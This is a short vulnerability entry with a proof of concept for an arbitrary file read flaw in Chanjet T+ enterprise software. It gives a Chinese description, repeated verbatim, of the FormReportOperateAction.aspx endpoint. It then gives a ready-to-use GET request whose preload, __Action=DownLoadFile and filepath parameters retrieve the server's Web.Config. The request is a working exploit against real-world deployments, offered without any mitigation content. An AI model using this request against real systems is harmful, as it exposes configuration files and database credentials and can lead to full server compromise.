Description
畅捷通T+是用友畅捷通公司推出的一款面向中小企业的企业管理软件。其/tplus/FormReport/FormReportOperateAction.aspx接口存在文件读取漏洞。攻击者可通过preload、__Action、filepath参数读取服务器上的任意文件,包括配置文件、源代码等敏感信息,可能导致数据库凭证泄露、服务器权限被完全控制。
畅捷通T+是用友畅捷通公司推出的一款面向中小企业的企业管理软件。其/tplus/FormReport/FormReportOperateAction.aspx接口存在文件读取漏洞。攻击者可通过preload、__Action、filepath参数读取服务器上的任意文件,包括配置文件、源代码等敏感信息,可能导致数据库凭证泄露、服务器权限被完全控制。
GET /tplus/FormReport/FormReportOperateAction.aspx?preload=1&__Action=DownLoadFile&filepath=/Web.Config HTTP/1.1
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.